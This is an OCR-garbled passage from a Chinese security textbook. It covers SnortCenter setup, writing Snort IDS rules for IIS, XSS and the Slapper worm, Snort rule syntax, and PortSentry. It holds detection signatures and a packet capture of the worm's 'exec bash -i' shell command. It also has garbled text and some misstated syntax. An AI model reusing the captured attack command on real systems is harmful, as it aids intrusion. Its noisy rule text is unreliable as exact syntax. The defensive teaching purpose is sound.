创建 好 数据 库 之 后 , 在 Web 浏览 器 中 就 可 以 看 到 SnortCenter 管理 控制 台 了 (地 址 为 https: 
//localhost/snortcenter) ， 如 图 7.2 所 示 。 这 里 建立 了 SnortCenter 需要 的 所 有 表 。 也 可 以 用 位 于 
tarball 的 snortcenter db.Mysql 脚本 创建 它们 。 这 就 完成 了 SnortCenter 管理 控制 台 部 分 的 安装 。 
第 一 次 登录 时 ， 需 要 修改 用 户 名 admin 和 口令 。 


[SnoriCenter 0905 OE= 


图 7.2 ”SnortCenter 管理 控制 台 


2. 安装 SnortCenter 传感器 代理 


要 完成 SnortCenter 的 安装 ， 还 需 在 你 想 用 SnortCenter 管理 的 传感器 上 安装 SnortCenter 
传感器 代理 。 安 装 基于 UNIX 的 代理 时 还 需要 安装 Perl、OpenSSL 和 Perl 模块 Net::SSLeay。 
前 面 我 们 已 经 在 传感器 上 安装 了 OpenSSL 和 Perl， 现 在 只 需要 进行 Net:SSLeay 模块 的 安装 。 
可 以 在 网 址 http://search.cpan.org 下 载 该 模块 。 

下 载 并 安装 Net::SSLeay， 首 先 在 源 目录 下 执行 下 列 命令 : 

Perl Makefile.pl 

Make install 


安装 好 Net::SSLeay 模块 后 , 需 创 建 SnortCenter 传感器 代理 所 用 的 目录 , 即 创建 下 列 目录 。 


@ 程序 目录 : /usr/local/snortcenter。 
@ 配置 目录 : /usr/local/snortcenter/conf。 
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@ 日 志 目 录 : /usrAocal/snortcenter/log. 
@ 策略 目录 : /usr/local/snortcenter/rules。 


接着 ， 还 需 为 SnortCenter 创建 一 个 SSL 证 书 ， 可 使 用 下 面 的 命令 行 创建 它 : 


#0o0penssl req -new -x509 -days 365 -nodes -out snortcenter.pem -keyout 


snortcenter. pem 


将 snortcenter.pem 文件 复制 到 /usr/local/snortcenter/conf 目录 下 。 现 在 就 可 以 准备 安装 
SnortCenter 传感器 代理 了 ， 在 http://users.pandora.be/larc/download/ 中 下 载 合适 的 版 本 。 
将 文件 解压 并 移动 到 /usrlocal/snortcenter/ 目 录 下 ， 运 行 安装 的 Shell 脚本 : 


#./setup.sh 


安装 脚本 会 提出 许多 问题 。 已 经 为 Snort 和 SnortCenter 创建 所 需 的 文件 夹 了 ， 当 询问 时 依 
次 输入 这 些 目 录 即 可 。 代理 可 以 运行 在 任何 端口 上 , 可 以 任意 指定 , 但 要 记 住 选择 的 是 哪 一 个 
端口 。 指 定 SnortCenter 管理 和 侦 听 的 网 卡 人 P 地 址 。 当 出 现 启用 SSL 选项 时 ， 选 择 Yes。 你 也 
应 该 注意 记 住 代 理 的 登录 名 和 口令 ,在 管理 器 控制 台中 输入 认证 信息 。 最 后 的 选项 是 设置 Snort 
服务 器 的 瑟 地 址 。 这 样 就 完成 了 SnortCenter 传感器 代理 的 安装 。 重 复 这 个 安装 过 程 ， 为 你 的 
Snort 环境 中 的 每 个 传感器 安装 代理 。 

配置 SnortCenter， 要 想 升 级 传感器 的 多 种 配置 ， 必 须 首先 在 SnortCenter 管理 控制 台中 添 
加 它们 ， 图 7.3 表示 在 SnortCenter 中 加 入 一 个 传感器 。 

[COICTOTECTRTOIC ) 


一 一 一 一 [create a new sensor 
Enable Sensor 区 
Sensor Name Eggy 
Sensor IP 92168 1.19 Port# 525 
Sensor Username [ealfast 
Sensor Password ye 
Sensor Agent Type Sno sr Agent v.1 (SSL enabled) | 
Interface name to sniff Et 


Activate default Variables 区 
Activate default Rules ”区 


Activate default 5 
Preprocessors 

Activate default Output = 

Plugins 

Activate default 

RuleTypes 

Activate default 扩 

Classifications 

Snort command line nor -¢ snort conf -1 arsnortfiogs -iethl -usnort]-g 


图 7.3 在 SnortCenter 中 加 入 传感器 


在 管理 控制 台中 可 以 通过 下 拉 列 表 框 查看 规则 分 类 , 如 图 7.4 所 示 的 下 拉 列 表 框 将 规则 入 
应 用 于 一 个 特定 的 传感器 配置 。 


硫 
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SnortCenier v0.95 


Hide Activated Rules ” 国 
Hide Deactivated Rules 加 


$EXTERNAL_NET any 
OS Stacheldraht server-spoof"; type: Di icmp_Iid: 666; reference! arachnids,193; 


IOME_NET > $EXTERNAL_NET any 
Te i ld! 2251 revs 1 msgt “DDOS Stacheldraht server response gag™s itype: 0; cnp_idi 669; contenti "173 69 63 
6E1" reference: arachnids,195; casstype: attempted-dos;) 


msg! "DDOS Stacheldraht server-response”™; itype! Di iemp_id! 667; content! "166 69 63 6B 65 
arachnids,191; dasstype; attempted-dos;) 


图 7.4 将 规则 集 应 用 于 一 个 传感器 配置 


7.1.3 ”编写 Snort 规则 


1. 基础 


在 编写 规则 之 前 强调 一 点 : - 定 要 注意 语法 ， 违 反 语 法 的 Snort 规则 将 不 能 被 载 入 到 检测 
机 制 中 。 如 果 载 入 语法 有 错 ea, 那么 可 能 导致 不 可 预料 的 后 果 。 这 个 规则 会 被 大 量 的 正常 
流量 所 触发 ， 造 成 一 系列 误 报 ， 可 能 潜在 地 使 入 侵 数 据 库 超载 。 

和 编程 一 样 ， 对 于 刚 接触 Snort 规则 编写 的 新 手 而 言 ， 编 写 Snort 规则 最 简单 的 一 种 方法 
就 是 对 已 有 的 规则 进行 修改 ， 假 设 机 构 中 只 有 一 台 IIS 服务 器 ， 想 修改 与 IS 相关 的 规则 使 它 
们 仅仅 应 用 在 这 台 服 务 器 上 , 而 不 是 用 在 每 台 Web 服务 器 上 ,一 开始 , 可 能 想 要 修改 Snort-sigs 
邮件 列表 中 的 后 级 为 .htr chunked 的 编码 规则 ， 这 条 规则 如 下 : 


alert tcp $ EXTERNAL NET any -> $ HTTP SERVERS $ HTTP PORTS (msg:"Web-IIS.htr 


chunked encoding"; uricontent: ".htr";classtype:web-application-attack;rev: 1;) 


为 了 使 它 仅仅 应 用 于 IS 服务 器 上 ， 应 改 为 : 


alert tcp $ EXTEBNAL NET any -> 192.168.1.1 $ HTTP PORTS (msg: " Web-IIS.htr 


chunked encoding"; urioontent: ".htr";classtype: web-application-attack;rev: 2;) 


现在 将 仅仅 可 以 在 192.168.1.1 的 Web 服务 器 上 使 用 该 规则 ， 注 意 rev 关键 字 增 1 表明 这 
是 一 个 已 存在 的 规则 的 新 版 本 。 下 面 进一步 提炼 该 规则 : 希望 仅 在 向 服务 器 提出 请 求 时 使 用 该 
规则 ， 因 为 这 个 方向 的 流量 可 能 会 是 一 个 攻击 。 由 于 后 面 的 缘故 , 也 可 能 希望 仅仅 在 已 建立 的 
TCP 会 话 中 应 用 该 规则 ， 阻 止 某 些 人 用 误 报 的 洪水 进行 DoSing Snort 攻击 。 可 以 加 入 flow 选 
项 ， 规 则 如 下 : 


alert tcp $ EXTERNAL NET any ->192.168.1.1 $ HTTP PORTS (msg:"Web-IIS.htr 
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chunked 
encoding"flow:to server,established;uricontent:".htr";classtype:web-applicatio 


n-attack; rev:3;) 
运行 该 规则 之 后 ， 会 注意 到 误 报 迅速 减少 。 
2. 提高 


有 了 上 面 的 基础 , 我 们 再 讨论 一 个 比较 复杂 的 情况 。 当 网 站 允许 恶意 代码 被 插入 到 一 个 动 
态 创建 的 网 页 中 时 ， 跨 站 脚本 (XSS) 攻击 就 发 生 了 。 若 不 能 正确 地 检查 用 户 输入 ， 攻 击 者 就 
可 以 在 网 页 中 嵌入 脚本 ， 这 些 脚 本 使 Web 应 用 程序 不 能 按照 预期 的 计划 执行 。XSS 攻击 可 以 
用 于 盗窃 认 证 所 用 的 Cookies、 访 问 部 分 受 限制 的 Web 站 点 或 是 攻击 其 他 Web 应 用 程序 。 大 
多 数 的 XSS 攻击 需要 向 特定 页 面 请 求 中 插入 脚本 标记 。 可 以 使 用 XSS 攻击 的 这 个 特征 编写 规 
则 。 因 为 只 要 向 Web 应 用 程序 插入 XSS 脚本 , 就 会 使 用 到 < SCRIPT>、<OBJECT>、<APPLET> 
和 <EMBED> 这 些 标记 。 举 个 例子 ， 你 能 够 创建 一 个 规则 ， 当 发 现 < SCRIPT> 标 记 时 触发 该 规 
则 。 首 先 ， 应 该 创建 一 个 规则 触发 包含 “< SCRIPT> ”字符 串 内 容 的 流量 : 


alert tcp any any -> any any (content:"<SCRIPT>"; msg: "Web-MISC XSS attempt";) 


XSS 攻击 一 定 会 触发 这 个 规则 ， 但 不 幸 的 是 ， 许 多 其 他 的 正常 流量 也 会 触发 这 个 规则 。 
例如 ， 假 设 某 个 人 发 送 一 个 嵌 有 JavaScript 的 电子 邮件 ，Snort 也 会 发 出 报警 ， 从 而 产生 误 报 。 
为 了 避免 这 种 情况 的 发 生 ， 就 需要 修改 这 个 规则 ， 使 其 仅仅 在 Web 流量 中 触发 : 


alert tcp SEXTERNRL_NET any ->$ HTTP_SERVERS $ HTTP_PORTS (content:"<SCRIPT>"; 
msg:"Web-MISC XSS attempt";) 


现在 , 仅 在 来 自 Web 服务 器 的 相关 HTTP 会 话 中 检测 到 <SCRIPT> 内 容 时 , 才 会 触发 该 规 
则 。 当 流量 开始 于 一 个 外 部 的 他 地 址 ($ EXTERNAL NET) ， 并 被 发 送 给 Web 服务 器 
($ HTTP SERVERS) 上 的 HTTP 服务 端口 ($ HTTP PORTS) 时 ， 该 规则 才 被 触发 。 当 正 
确 标识 公司 所 有 的 Web 服务 器 和 它们 所 运行 的 端口 时 , XSS 规则 仅 当 被 发 送 到 Web 服务 器 上 
时 才 触 发 。 但 是 ， 在 载 入 这 个 规则 之 后 ， 你 会 发 现 无 论 何 时 有 包含 JavaScript 的 请 求 时 ， 都 会 
产生 大 量 的 误 报 。 因 此 ， 需 要 更 进一步 地 提炼 这 个 规则 ， 找 到 XSS 流量 的 唯一 特征 。 

当 客 户 在 请 求 中 嵌入 < SCRIPT > 标记 时 会 发 生 XSS。 如 果 服 务 器 发 送 请 求 响应 的 
<SCRIPT> 标 记 时 ， 它 可 能 是 正确 的 流量 (JavaScript) ， 而 不 是 一 个 XSS 攻击 。 可 以 使 用 这 
个 XSS 攻击 特征 进一步 提炼 该 规则 : 


alert tcp $ EXTERNAL NET any->$HTTP SERVERS $ HTTP PORTS (msg:"Web-MISC XSS 


attempt"; flow:to server,established;content:"<SCRIPT>";) 


校正 后 的 规则 使 用 了 flow 选项 ， 该 选项 使 用 Snort 的 TCP 重建 特征 来 鉴别 流量 的 方向 。 
通过 应 用 特定 的 flow 选项 ， 规 则 仅仅 对 从 客户 端 向 服务 器 端 发 起 的 会 话 有 效 。 一 个 XSS 攻击 
只 会 发 生 在 这 个 方向 传输 的 流量 上 , 而 反方 向 上 的 流量 可 能 是 一 个 包含 JavaScript 标记 的 正常 
的 HTTP 会 话 。 
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现在 规则 已 经 可 以 识别 XSS 攻击 了 ， 接 着 需要 利用 大 小 写 敏感 性 来 确保 攻击 者 不 能 躲避 
规则 。Contend 选项 就 是 用 于 区 分 大 小 写 的 ， 然 而 HTML 不 是 , 因此 攻击 者 可 以 通过 将 脚本 标 
记 修改 为 < SCRIPT> 或 <script > 避 开 这 个 规则 ， 为 了 弥补 这 一 点 ， 可 应 用 Contend 选项 来 指定 
不 区 分 大 小 写 : 


alert tcp $ EXTERNAL NET any-> $ HTTP SERVERS $ HTTP PORTS (msg:"Web-MISC XSS 


attempt"; flow:to server,established; content:"<SCRIPT>"; nocase;) 
为 了 完成 该 规则 ， 还 需 给 它 赋予 一 个 高 的 优先 级 : 


alert tcp $ EXTERNAL NET any ->$ HTTP_ SERVERS $ HTTP_ PORTS (msg:"Web-MISC XSS 


attempt";flow:to server,established; content:"<SCRIPT>"; nocase;priority:1;) 
至 此 ， 就 完成 了 XSS 规则 的 编写 。 


3. 分 析 流量 并 创建 新 规则 


通过 检查 数据 包 来 创建 规则 是 最 难 的 , 但 也 是 最 有 价值 的 编写 方法 。 当 研究 一 个 新 的 漏洞 
或 攻击 时 ,通常 都 是 采用 流量 分 析 来 创建 新 规则 。 流 量 分 析 也 被 用 于 提炼 或 修改 已 存在 的 规则 。 
现在 假设 想 创建 一 个 用 于 监控 Linux 下 Slapper 蠕虫 的 规则 ， 但 手 里 没有 蠕虫 的 样本 ， 那 么 不 
得 不 将 嗅 探 器 放 在 一 个 防火 墙 后 面 ， 仅 仅 开放 Slapper 使 用 的 那个 端口 。Slapper 是 利用 了 
OpenSSL 中 的 一 个 安全 漏洞 ,因此 最 好 打开 端口 443/tcp, 这 是 传统 的 HTTPS 端口 。 如 果 Apache 
被 Slapper 攻击 了 ， 应 该 从 服务 器 得 到 一 个 如 “no job control in this shell ”这样 的 响应 。 首 先 
用 tcpdump 捕获 数据 包 ， 然 后 使 用 grep 分 析 tcpdump 日 志 ， 发 现 如 下 信息 : 


16:45:00.58749 worm.host.com.3568 > openssl.webhost.https: 

P 561:605(44) ack 987 win 7660 <nop,nop,timestamp 45618795 157894758> (DF) 
0x0000 4500 f8al 0fd5 0lbb 6al0 a9ae b61f 10dl ES...... | 

0x0010 0f47 57f6 5445 524d 3d78 7465 726d 3b20 .GW.TERM=xterm;. 

0x0020 6578 706f 7274 2054 4552 4d3d 7874 6572 export.TERM=xter 

0x0030 6d3b 2065 7865 6320 6261 7368 202d 690a mi .exec.bash.-i. 

0x0040 8018 ldce 0945 0000 0101 080a 035f f2c4 ..... 和 

0x0050 0388 0388 56ad 4000 3106 1369 3ee2 2483 ....V.@.1..i>.$. 
16:45:00.68799 openss1.webhost.com.https > worm.host.com.3568: 

. ack 210 win 7542 <nop,nop,timestamp 157894758 45618795> (DF) 

0x0000 4500 0034 Sbdf 4000 4006 028b 8053 f8al E..4[.@.@....S.. 

Ox0010 3ee2 2483, 0Tbb 0fd5 Db61f 10d1 6al0 a9ae >-95 -0 机 3 

0x0020 8010 1920 37al 0000 0101 080a 0f47 580b 
0x0030 035f f2b0 ._.. 


16:45:00.85714 openssl.webhost.com.https > worm.host.com.3568 

P 1147:1182(35) ack 210 win 7542 <nop,nop,timestamp 157894758 45618795> (DF) 
0x0000 4500 0057 5be0 4000 4006 0267 8053 f8al E..W[.@.@..g.S.. 

0x0010 035f f2b0 6261 7368 3a20 6e6f 206a 6f62 ._..bash:.no.job 
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0x0020 2063 6f6e 7472 6f6c 2069 6e20 7468 6973 .control.in.this 
0x0030 2073 6865 6c6c 0a .shell. 


第 一 个 数据 包 包括 一 个 content 表达 式 ， 它 对 于 这 个 蠕虫 攻击 是 唯一 的 。 下 面 两 个 是 用 来 
发 现 攻击 时 服务 器 的 响应 。 可 以 使 用 “export TERM = xterm \; exec bash-i” 来 创建 那个 特征 。 
从 规则 头 开 始 ， 应 该 警告 来 自任 何 端口 、 任 何 外 部 源 输入 的 TCP 流量 。 让 该 规则 仅仅 应 用 于 
Web 服务 器 ， 并 且 指 定 HTTPS 端口 (443) : 


alert tcp S$EXTERNAL NET any -> S$HTTP SERVERS 443 


为 了 建立 该 规则 选项 ， 可 利用 找到 的 content 字符 串 ， 注 意 不 区 分 大 小 写 ， 也 可 能 仅仅 想 
对 设置 了 ACK 标志 的 TCP 标志 报警 : 


(msg:"Slapper attack"; flow: to_server, established; content:"export 
TERM=xterm\; 
exec bash -i"? nocasey priority:1; rev:l) 


同样 为 该 警报 分 配 优先 级 为 1， 这 样 就 可 以 得 到 实时 报警 了 。 完 成 后 的 规则 如 下 : 


alert tcp $EXTERNAL NET any -> $HTTP_ SERVERS 443 
(msg:"Slapper attack"; flow: to_ server, established; 


content:"export TERM=xterm\; exec bash -i"; nocase; priority:1; rev:1) 


这 就 完成 了 监控 Slapper 蠕虫 的 规则 。 显 而 易 见 ， 编 写 该 规则 的 一 半 工 作 在 于 识别 含有 确 
切 攻击 的 正确 数据 包 。 当 编写 新 规则 时 ， 遇 到 了 问题 可 以 去 Snort 社区 寻求 帮助 ， 很 可 能 其 他 
人 会 有 一 些 信息 、 资 源 或 共享 的 数据 。 


7.1.4 分析 Snort 规则 


经 过 以 上 对 Snort 规则 的 介绍 和 应 用 举例 , 相信 各 位 读者 对 于 Snort 的 使 用 有 了 一 些 体会 ， 
当然 ， 当 我 们 把 Snort 作为 IDS 系统 来 使 用 时 ， 便 需要 详细 地 了 解 这 些 过 滤 规 则 语法 到 底 是 怎 
么 组 成 的 以 及 它们 的 含义 。 多 数 Snort 规则 都 是 以 一 个 单行 来 进行 描述 ， 当 然 复 杂 的 情况 也 有 
规则 因为 长 度 的 关系 会 搭配 进行 分 行 处 理 。 例 如 : 


alert icmp S$EXTERNAL NET any -> SHOME NET any (msg: "ICMP ISS Ping"; 
itype;8;content: "ISSPNGRQ™"; depth:32;reference:arachnids,158;classtype: 


attempted-recon;sid:456; rev:4;) 


Snort 的 规则 通常 可 以 分 为 两 大 部 分 : 规则 头 和 规则 动作 ， 规 则 例子 如 图 7.5 所 示 。 
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Displaying events 1-1 of about 1 matching your selection 344 total events in database | 


1 Signature Date GMT+800。 Sensor Source Destination 


加 加 加 Snort "ET POUCY GNU/Linux i 二 
了 口 APTUser-AgentOutbound likely relatedto 2013-07-2823:00:01 server 。 192.168.11.30.32861 [sl 70.38.37.7:80 区 > 9 


package managemen 
如 多 Snort rule Detection 
File: emerging-policy.rules 


Rule: alert tcp SHOME_NET any -> $EXTERNAL_NET $HTTP_PORTS 
msg: "ET POLICY GNU/Linux APT User-Agent Outbound likely related to package management" 
flow: established,to_server 
content: "APT-HTTPI2F|” 
http_header: 
reference: url,help.ubuntu.com/community/AptGet/Howto 
classtype: not-suspicious 
sid: 2013504 
rev: 3 


图 7.5 ”Ossim 中 Snort 规则 举例 
@ Snort 规 则 头 (Rule Header): 在 规则 头 中 包含 了 检测 数据 包 的 基本 信息 ， 一 共 包 含 了 
7 个 项 目 ， 每 个 项 目 都 会 记录 着 特定 信息 来 提供 给 规则 判断 使 用 。 
@ 规则 动作 (RuleAction ): 这 个 项 目 包 含 表 7.1 中 列 出 的 规则 动作 ， 用 来 针对 数据 包 进 
行 执行 判断 。 
表 7.1 ”Snort 规则 动作 说 明 
规则 动作 
针对 此 数据 包产 生 一 个 警报 ， 并 且 记录 
和 


| Pass | 忽略 符合 这 个 规则 的 数据 包 
针对 此 数据 包产 生 一 个 警报 ， 并 且 以 另外 一 个 Dynamic 规则 来 进行 数据 包 的 处 理 
Dynamic 主要 是 针对 Activate 规则 动作 提供 数据 包 处 理 时 使 用 


使 用 Snort 规则 主要 需要 熟悉 以 下 概念 。 


(1) 协定 (Protocol) 
常见 的 有 TCP、UDP 或 ICMP 协定 等 。 
(2) 源 了 下 (SourceIP Address) 
针对 通过 规则 的 数据 包 来 源 卫 地 址 进行 指定 ， 可 以 通过 正规 表达 式 的 方式 来 设 定 一 个 符 
合 的 来 源 下 地 址 样式 。 如 果 在 来 源 他 地 址 前 方 添加 上 一 个 “! ”号 时 ， 则 表示 除 此 之 外 的 人? 
地 址 数据 包 。 例 如 : 


Alert tcp ! [192.168.150.0/24,192.168.200.0/24] any 


在 上 面 这 个 条 件 中 ， 针 对 不 是 从 192.168.150.0/24 与 192.168.200.0/24 这 两 个 网 段 的 任 一 
来 源 的 TCP 数据 包 进 行 警报 。 
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(3) 源 端口 (Source Port) 

它 可 以 用 来 将 规则 定义 的 更 加 详细 ， 常 见 的 用 法 是 使 用 any 这 个 关键 字 来 表示 所 有 的 端 
口 ， 或 是 利用 一 段 范围 来 表示 一 个 指定 的 端口 ， 下 面 举 几 个 例子 : 

@ 所 有 范围 : log tcp 192.168.150.0/24 any 


@ 一 段 端口 范围 : log tcp 192.168.150.0/24 any 1:1024 
@ 某 个 特定 端口 : log tcp 192.168.150.0/24 80 


除 以 上 三 种 基本 表示 方式 之 外 ， 还 有 下 面 三 种 特殊 形式 : 


@ 小 于 等 于 一 个 端口 的 表示 : log tcp 192.168.150.0/24 :1024 
@ 大 于 等 于 一 个 端口 的 表示 : log tcp 192.168.150.0/24 8000 
@ 排除 某 个 端口 的 表示 : log tcp 192.168.1.0/24 ! 23 


(4) 指示 动作 (Direction Operator) 

指示 动作 通常 是 用 于 连接 源 卫 与 目的 正 的 关系 ， 常 见 的 指示 动作 有 两 种 : 

@ 方向 操作 符号 ->: 方向 操作 符号 是 常见 的 指示 动作 ， 符 号 的 左边 代表 源 卫 ， 而 符号 的 
右边 是 数据 包 的 目的 卫 和 端口 号 ， 实 际 上 是 一 个 两 条 方向 相反 规则 的 合并 ， 即 “ 源 -> 
目的 ， 目 的 -> 源 "， 在 构建 规则 时 ， 此 规则 将 被 拆 分 成 为 两 条 规则 ， 例 如 : 

log tcp any any ->192.168.150.0/24 443 

这 个 含义 是 通过 Snort 来 记录 来 自任 何 卫 和 端口 的 所 有 TCP 数据 包 ， 只 要 这 些 数据 包 的 

目的 地 址 是 流向 192.168.150.0/24 这 个 网 段 中 的 443 端口 ， 便 将 这 些 数据 包 记 录 下 来 。 

@ 双向 操作 符号 ( ): 它 可 以 将 源 亿 、 端 口号 、 目 的 中 及 端口 号 进行 交换 判断 使 用 。 例 如 : 

log tcp 192.168.150.0/24 80 any () 192.168.150.0/24 80 

这 句 规则 表示 源 IP 可 能 是 从 192.168.150.0/24 网 段 中 的 任何 一 个 TCP 数据 包 或 是 从 

192.168.150.0/24 网 段 中 80 端口 传 过 来 的 数据 包 ， 而 目的 地 址 除了 为 192.168.150.0/24 网 段 中 


的 80 端口 之 外 ， 也 可 能 是 192.168.150.0/24 网 段 中 的 任何 一 个 地 址 ， 这 些 数据 包 都 会 被 记录 
下 来 。 


(5) 目的 IP (Destination IP Address) 
目的 他 的 使 用 方式 与 来 源 卫 的 使 用 方式 相同 。 


(6) 目的 端口 (Destination Port) 
目的 端口 的 使 用 方式 与 源 端口 的 使 用 方式 相同 。 


(7) 规则 选项 (Rule Options) 
刚才 所 介绍 的 规则 头 栏 目 ， 是 Snort 规则 对 于 数据 包 进 入 时 的 最 初 对 比 ， 而 比 对 匹配 成 功 
后 的 数据 包 怎 么 处 理 呢 ? 应 该 执行 哪些 动作 ? 这 就 是 规则 选项 该 发 挥 的 作用 了 .规则 选项 部 分 
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可 以 说 是 整个 


Snort 引擎 的 核心 所 在 ,使 用 规则 选项 时 要 特别 注意 两 个 符号 的 使 用 , 分别 是 分 


号 (; ) 与 冒号 (: ) 。Snort 所 提供 的 规则 选项 符号 很 多 ， 但 大 致 上 可 以 归纳 成 2 个 主要 的 
类 型 来 进行 探讨 。 
@ 一 般 形 态 的 规则 选项 (General Rule 0ptions ): 在 这 个 类 型 中 的 规则 选项 通常 是 用 
来 提供 资讯 给 规则 进行 使 用 ， 但 这 些 资讯 并 不 会 影响 到 检测 的 结果 或 是 过 程 。 常 见 的 
规则 选项 如 表 7.2 所 示 。 


规则 选项 


表 7.2 规则 选项 
说 明 


msg 


reference 


gid 


sid 


classtype 


msg 这 个 规则 选项 的 主要 功能 是 当 封包 检测 符合 规则 时 ， 在 记录 或 是 发 出 警报 信息 时 , 会 将 
msg 这 个 规则 选项 中 所 指定 的 文字 信息 一 并 记录 或 是 在 发 出 警报 信息 中 显示 。 其 语法 格式 
为 : msg:“<message text>”; 图 中 显示 为 “ET POLICY GNU/Linux APT User-Agent Outbound 
likely related to package management” 
Reference 主要 用 来 提供 Snort 使 用 其 他 的 外 部 攻击 识别 系统 来 帮助 入 侵 检测 的 强度 , 可 以 引 
入 一 些 由 Snort 所 认可 的 一 些 外 部 网 站 来 进行 使 用 ， 其 语法 格式 为 “reference:<id 
system>,<id>; ”Reference 所 支持 的 外 部 系统 如 表 7.3 所 示 

有 些 snort 规则 会 显示 gid 这 个 规则 选项 ， 它 是 指 用 来 识别 所 设 定 的 规则 内 容 是 属于 Snort 
所 规范 的 哪些 事件 ， 这 些 事件 识别 码 都 会 预先 定义 在 /etc/snort/gen-msg.map 文件 (大 小 约 为 
25KB) 内 。 其 语法 格式 为 :“gid:<generator id>;”。 预 设 规则 如 果 不 指定 使 用 的 gid 识别 码 ， 
那么 是 直接 使 用 1(snort general alert) 来 进行 运作 ， 读 者 若 希 望 自 定义 新 的 gid 识别 码 时 最 好 
是 从 一 百 万 以 后 开始 编码 使 用 

sid 这 个 规则 选项 是 指 用 来 识别 所 使 用 的 Snort 规则 项 目 ， 这 些 Snort 所 使 用 的 规则 项 目 预 先 

会 定义 在 /etc/snort/sid-msg.map 文件 (大 小 约 为 2.7MB ) 内 。 其 语法 格式 为 :“sid:<snort rules 

id>;”。 而 sid 所 使 用 的 范围 基本 上 分 为 三 大 部 分 ， 分 别 为 : 

“小 于 100: 这 是 保留 给 未 来 扩充 时 使 用 。 

"100 一 1.000.000: Snort 官方 所 预 设 配置 的 规则 项 目 。 

“大 于 1.000.000: 本 机 所 自 定义 的 Snort 规则 项 目 。 

classtype 这 个 规则 选项 可 以 用 来 将 所 设计 的 入 侵 检测 规则 进行 分 类 并 且 赋 予 一 个 预 设 的 优 
先 等 级 ，Snort 提供 了 许多 不 同 的 规则 分 类 ,这些 分 类 可 以 让 Snort 在 运行 时 更 有 弹性 。 其 语 
法 格式 为 “classtype:<class name>”。classtype 含义 如 表 7.4 所 示 


TeV 


rev 这 个 规则 选项 是 针对 Snort 规则 所 识别 的 修订 识别 码 ， 一 般 在 它 上 面 都 会 措 配 sid。 其 语 


法 格式 为 :“rev:<revision integer>” 


Priority 


可 选项 priority 规则 , 它 可 以 用 来 指定 Snort 规 则 的 优先 等 级 ,其 语法 格式 为 *priority:< priority 
integer>:”。 如 果 读 者 在 规则 中 使 用 priority 时 也 搭配 使 用 刚才 所 介绍 的 classtype 时 ， 由 于 
classtype 中 有 一 个 预 设 优先 权 选 项 ， 若 是 这 个 选项 值 也 被 启用 将 会 覆盖 priority 规则 选项 中 
的 值 ， 读 者 在 操作 时 需要 注意 
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表 7.3 reference 所 支持 的 外 部 系统 


支持 系统 ID 网 址 

Buegtraq http://www.securityfocus.com/bid 
nessus http://www.nessus.ore/plugins/ 

cve http://cve.mitre.org/compatible/ 
osvdb http://osvdb.org/show/osvdb/ 
arachNIDS http://www.whitehats.com/info/IDS 


这 些 网 址 在 /etc/snort/reference.config 文件 中 定义 ， 然 后 会 被 snort 主 配 置 文件 snort.conf 
所 引用 。 

表 7.4 Snort 中 classtype 含义 
classtype 
Attempted-admin 试图 取得 管理 员 权 限 
Successful-admin 
Policy-violation 
Shellcode-detect 
Trojan-activigy 
Web-application-attack 宫 


Attempted-dos 拒绝 服务 攻击 


@ 有 效 载荷 的 规则 选项 (Payload Rule Options ): 这 个 选项 类 型 通常 可 以 针对 特定 的 数据 
包 内 容 来 进行 设 定 搜索 条 件 。 有 效 载荷 规则 选项 的 含义 如 表 7.5 所 示 。 其 中 content 选 
项 中 关键 词 的 使 用 如 表 7.6 所 示 。 


表 7.5 有 效 载荷 规则 选项 含义 
含义 
这 个 选 型 可 允许 使 用 者 自己 定义 关键 字 进 行 数据 包 内 容 的 有 效 载荷 搜索 。 语 法 为 
“content: [!] "<content string>"”， 它 可 以 拱 配 关键 词 来 搜索 ,具体 关键 词 见 下 表 7.6 
pcre 这 一 规则 选项 允许 使 用 在 设计 snort 规则 时 使 用 perl 相 兼 容 的 表达 式 
这 个 规则 代表 允许 使 用 者 通过 正规 表达 式 处 理 URI 内 容 ， 语 法 为 “uricontent: 


规则 选项 


content 


Uricontent 
[!]"<content string>"” 
表 7.6 ”content 选项 中 关键 词 的 使 用 
关键 词 ” | 含义 
它 用 来 指定 snort 规则 在 搜索 数据 包 时 要 从 哪 一 个 地 方 开始 搜索 , 语法 为 :“offset:<number>”， 
例如 “alert tcp any any -> any 8080 (content:“cgi-bin/open”; offset 10:depth:6:)” 这 条 规则 的 含义 
Se 


是 针对 传 入 到 8080 端口 的 tcp 数据 包 ， 跳 过 前 面 10 个 单位 内 容 ， 往 后 5 个 单位 内 容 搜索 
cgi-bin/open 的 字符 串 
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( 续 表 ) 
[关键 启 | 含义 | 


Distance 指定 snort 规则 在 搜索 数据 包 内 容 时 可 以 用 来 确认 搜索 的 内 容 至 少 有 符合 和 个 位 的 结果 存在 


Within 指定 snort 规则 在 搜索 数据 包 内 容 时 ， 可 以 用 来 确认 搜索 的 内 容 最 多 只 有 符合 X 个 的 结果 存在 
用 来 指定 snort 规则 在 搜索 数据 包 时 , 是 以 HTTP 用 户 端 连接 请 求 的 数据 包 的 HTTP 表 头 内 容 
进行 搜索 。 与 它 的 使 用 含义 类 似 的 关键 词 还 有 http_cookie、http method、http_uri 等 


http_header 


Snort 规则 的 编写 能 力 非 一 日 之 功 ， 因 此 在 平日 里 大 家 要 多 进行 实战 练习 多 总 结 ， 这 里 介 
绍 一 个 小 窍门 ， 利 用 两 款 网 络 分 析 光 盘 (BT4/5、DEFT 8) 中 蕴藏 着 的 丰富 测试 工具 来 激发 
Ossim 系统 中 的 Snort 规则 库 ， 通 过 渗透 测试 和 模拟 攻击 来 快速 获得 比较 全 面 的 信息 。 


7.2 Linux 下 PortSentry 的 配置 


Intemet 上 的 服务 器 一 般 都 会 被 安置 在 防火 墙 的 DMZ (Demilitarized Zone) 区 ， 从 而 受到 
防火 墙 的 保护 。 这 在 一 定 程度 上 可 以 防止 具有 已 知 非法 特征 的 危险 连接 和 恶意 攻击 , 但 是 却 防 
止 不 了 合法 用 户 的 非法 访问 。 什 么 时 候 会 出 现 合法 用 户 的 非法 访问 呢 ? 举例 来 说 , 如 合法 用 户 
的 机 器 被 他 人 控制 , 成 为 了 黑客 的 攻击 跳板 , 或 者 是 合法 用 户 想 做 一 些 别 有 用 心 的 探测 等 。 除 
此 之 外 ， 有 些 攻 击 者 还 会 用 端口 扫描 程序 扫描 服务 器 的 所 有 端口 ， 以 收集 有 用 的 信息 (如 哪些 
端口 是 打开 的 、 哪 些 是 关闭 的 )。 服 务 器 端口 被 扫描 往往 是 入 侵 的 前 奏 。 防 火 墙 的 脚本 大 多 是 
基于 规则 的 静态 表示 ， 对 于 网 络 上 动态 的 探测 就 显得 有 点 束手无策 了 。 


7.2.1 入 侵 检测 工具 简介 


